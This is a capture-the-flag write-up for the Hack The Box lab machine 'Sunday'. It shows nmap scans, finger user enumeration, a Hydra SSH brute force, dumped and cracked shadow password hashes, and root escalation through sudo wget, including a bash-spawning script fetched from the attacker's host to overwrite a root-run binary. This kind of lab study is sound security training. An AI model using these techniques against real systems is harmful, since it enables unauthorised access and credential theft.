Skip to main content

HTB - Sunday

alt

Basic Nmap scan

Nmap Command: nmap -Pn -n -sC -sV -oA scan_boxs/sunday/nmap/10.10.10.76-d-scan 10.10.10.76
Nmap scan report for 10.10.10.76
Host is up (0.14s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
79/tcp open finger?
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
|_finger: No one logged on\x0D
111/tcp open rpcbind 2-4 (RPC #100000)
515/tcp open printer

Open ports : 79,111,515

PORTSERVICEPRODUCTVERSIONEXTRAINFO
79finger
111rpcbind2-4RPC #100000
515printer

Scanning to detect all the ports:
Scan all ports

Scanning the remaining detected port.

Nmap Command: nmap -Pn -n -sV -sC -p 6786,22022 10.10.10.76
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-01 23:04 EDT
Nmap scan report for 10.10.10.76
Host is up (0.14s latency).

PORT STATE SERVICE VERSION
6786/tcp closed smc-jmx
22022/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_ 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.87 seconds

Port 79: finger

Nmap revealed that finger is running on this port other than that not much information is revealed. Upon google lead our seach to pentestmonkey.com this has been our go to site from reverse shell onliners and this has an interesting script for finger Service. This script probes to detect user from the list provided. https://pentestmonkey.net/tools/user-enumeration/finger-user-enum#:~:text=finger%2Duser%2Denum%20is%20a,returned%20by%20the%20finger%20service. source: https://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz

Command: ./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76 | less -S
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Wed Aug 3 01:30:40 2022 #########
[email protected]: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
[email protected]: Login Name TTY Idle When Where..adm Admin < . . . . >..dl
anne [email protected]: Login Name TTY Idle When Where..anne ???..marie ???..
[email protected]: bin ??? < . . . . >..
[email protected]: ikeuser IKE Admin < . . . . >..
jo [email protected]: Login Name TTY Idle When Where..ann ???..jo ???..
la [email protected]: Login Name TTY Idle When Where..la ???..verne ???..
[email protected]: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
[email protected]: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
miof [email protected]: Login Name TTY Idle When Where..mela ???..miof ???..
[email protected]: root Super-User console <Dec 19, 2021>..
[email protected]: sammy ??? ssh <Aug 2 08:46> 10.10.14.15 ..
[email protected]: sunny ??? ssh <Aug 2 08:42> 10.10.14.15 ..
[email protected]: sys ??? < . . . . >..
zsa [email protected]: Login Name TTY Idle When Where..zsa ???..zsa ???..
######## Scan completed at Wed Aug 3 01:45:47 2022 #########
15 results.

10177 queries in 907 seconds (11.2 queries / sec)

There are 2 users more interesting to work with sammy and sunny.

Exploit

Hydra attack

Using Hydra to crack the ssh passwd. alt

After brute forcing through SSH we find user sunny password is sunday. Login to the server as sunnny. alt

User flag

alt

Privilege escalation

Found an interesting folder in the root directory 'backup'

sunny@sunday:/$ ls -la
total 1858
drwxr-xr-x 25 root sys 28 Aug 2 02:07 .
drwxr-xr-x 25 root sys 28 Aug 2 02:07 ..
drwxr-xr-x 2 root root 4 Dec 19 2021 backup
lrwxrwxrwx 1 root root 9 Dec 8 2021 bin -> ./usr/bin
drwxr-xr-x 5 root sys 9 Dec 8 2021 boot
drwxr-xr-x 2 root root 4 Dec 19 2021 cdrom
drwxr-xr-x 219 root sys 219 Aug 2 02:07 dev
.
.
.
sunny@sunday:/$ ls backup/
agent22.backup shadow.backup
sunny@sunday:/$ cat backup/shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
sunny@sunday:/$

Crack password unshadow

Time to crack the hashes. Copy shadow.backup into shadow file and /etc/passwd file to passwd, then unshadow the file as below

└─$ unshadow passwd shadow > unshadow.txt

The output of unshadow.txt

└─$ cat unshadow.txt                                                                             
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:100:10::/home/sammy:/usr/bin/bash
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:101:10::/home/sunny:/usr/bin/bash

alt

Now we can login to the server with user sammy and see if we can exploit further alt

sudo reveals both the users have access to two different tools, sammy has access to /usr/bin/wget and sunny to /root/troll.

alt

Exploit

Root flag - wget

There are various methods to access root.txt file. One simple method is through exploiting --input-file option in wget. In this method we to search for the user which doesn't exist in the file and this failed attempt will discloses the content of the file.
alt

This way root flag is exposed due to failure of resolving the url. alt

Root flag - intended way

Initially we create an exploit on our local machine to execute a bash shell

$ echo -e '#!/usr/bin/bash\n\nbash' > troll
$ chmod +x troll

And then host it. we will use wget from sammy account on sunday machine and to download the exploit and overwrite the troll with our exploit and execute it quickly.

alt
alt alt

flag:
alt